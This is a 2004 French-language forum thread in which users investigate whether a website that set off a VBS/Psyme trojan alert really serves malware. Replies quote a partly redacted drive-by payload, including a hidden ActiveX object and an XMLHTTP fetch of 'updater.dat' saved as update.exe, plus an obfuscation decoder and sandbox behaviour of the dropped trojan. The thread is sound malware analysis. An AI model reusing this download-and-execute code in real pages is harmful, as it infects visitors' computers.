virus par site web...... ca existe ?

Le
gianni
Bonjour

Lorsque je me connecte à http://www.mol.mn/, VirusScan détecte un
cheval de troie VBS/Psyme. C'est possible ?

G.
Vos réponses Page 1 / 3
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
bruno
Le #1130766
cheval de Troie VBS/Psyme sur un site ?


Bonjour ,
oui ç'a existe !
mais norton ici le voie pas :-(
@suivre

joke0
Le #1470756
Salut,

Gianni V.:
Lorsque je me connecte à http://www.mol.mn/, VirusScan détecte
un cheval de troie VBS/Psyme. C'est possible ?


C'est possible. Psyme est un downloader VBS assez utilisé à des
fins frauduleuses.

J'ai regardé un peu, et le seul truc suspect est un script JS
crypté ici: http: / /66.139.77.145/

/Message à Guillermito: Ne clique pas là-dessus! :o) /

Si quelqu'un veut regarder ce que ça cache...

--
joke0

ts
Le #1470747
"j" == joke0





j> Si quelqu'un veut regarder ce que ça cache...

J'ai enlevé le plus dangereux (du moins je pense)

<html>
<head>
<title>a</title>
</head>
<body>
<br><br>
</iframe>
</body>
</html>


DD.DDD.DD.DDD est l'adresse que vous avez donné
XXX est pour main


--

Guy Decoux





NO_eikaewt_SPAM
Le #1470744
ts wrote:

http://DD.DDD.DD.DDD//XXX.chm::/XXX.html" type="text/x-scriptlet"></object>


Dans le main.chm, on trouve :

[...]
[DIV id="ObjectContainer">[/DIV]
[script type="text/javascript" language="JavaScript"]

function LaunchExecutable(ObjSrc)
{
tagstyle='style="display:none"';
ObjCLSID="clsid:XXXXXXXXXXXXXXXXXXXXXXXXXXX";
sObject ='<object classid="'+ObjCLSID+'" codebase="'+ObjSrc+'"
'+tagstyle+'></object>';
[...]
ObjSrc="C:\Program Files\Internet Explorer\update.exe";

var oXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
var InetPath="http://XX.XXX.77.145/updater.dat";
oXMLHTTP.Open("GET",InetPath,0);
oXMLHTTP.Send();
[...]

Le .dat est reconnu heuristiquement (comme Sandbox:Malware) par
Norman. Il est packe' avec UPX. Kaspersky (online) ne le connait pas.

La Sandbox de Norman me dit aussi :
- qu'il cree un mutex imain_mutex ;
- qu'il s'injecte dans un autre processus via "create remote thread"
- qu'il cree les fichiers suivants :
. C:WINDOWSSYSTEMrealupd.exe.
. C:WINDOWSSYSTEMrealupd32.exe.
. C:WINDOWSSYSTEMreal32.exe.

--
Tweakie

--
Posté via http://www.webatou.net/
Usenet dans votre navigateur !
Complaints-To:

NO_eikaewt_SPAM
Le #1470742
Tweakie wrote:

. C:WINDOWSSYSTEMrealupd.exe.


Selon Symantec, ca ressemble a une des versions de Mitgleider. Faudra
regarder de plus pres.

--
Tweakie

--
Posté via http://www.webatou.net/
Usenet dans votre navigateur !
Complaints-To:

Geo
Le #1470741
Bonjour

Selon Symantec, ca ressemble a une des versions de Mitgleider.
Faudra

regarder de plus pres.


Donc la réponse à la question posée, c'est oui ?

--

A+

joke0
Le #1470737
Salut,

Geo:
Donc la réponse à la question posée, c'est oui ?


La réponse c'est oui.

--
joke0

Geo
Le #1470735
Bonjour joke0


Salut,

Geo:
Donc la réponse à la question posée, c'est oui ?


La réponse c'est oui.


Merci.


Nicob
Le #1470731
On Tue, 27 Apr 2004 16:53:18 +0000, joke0 wrote:

J'ai regardé un peu, et le seul truc suspect est un script JS crypté
ici: http: / /66.139.77.145/


C'est juste la déclaration d'une variable et d'une fonction :

============================================================== var codelock_bas='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

function codelock_dec(str) {
str=str.split('@').join('CAg');
str=str.split('!').join('W5');
str=str.split('*').join('CAgI');
var bt, dt = '';
for(i=0; i>16, (bt & 0xff00) >>8, bt & 0xff); }
if(str.charCodeAt(i -2) == 61) {
return(dt.substring(0, dt.length -2));
} else if(str.charCodeAt(i -1) == 61) {
return(dt.substring(0, dt.length -1));
} else {
return(dt)
};
}
==============================================================
Une fonction de décodage, apparemment ... Mais je n'ai pas
trouvé (en cherchant peu) où se faisait les appels à ce code.


Nicob

JacK
Le #1470730
sur les news:
Gégé
ts a formulé la demande :
"j" == joke0





j> Si quelqu'un veut regarder ce que ça cache...

J'ai enlevé le plus dangereux (du moins je pense)



C'est gentil, mais quand je clique sur ton message, Norton me dit
qu'il détecte Bloodhound.Exploit.6 et m'en bloque l'accès.

C'est pas dangereux pour les lecteurs mals protégés ?


'lut,

Bloodhound.Exploit, c'est la détection générique de Norton : il soupçonne
quelque chose mais ne peut mettre un nom dessus ;)

Rien de dangereux dans le post de Joke0 : c'est du txt.
--
JacK







Publicité
Poster une réponse
Anonyme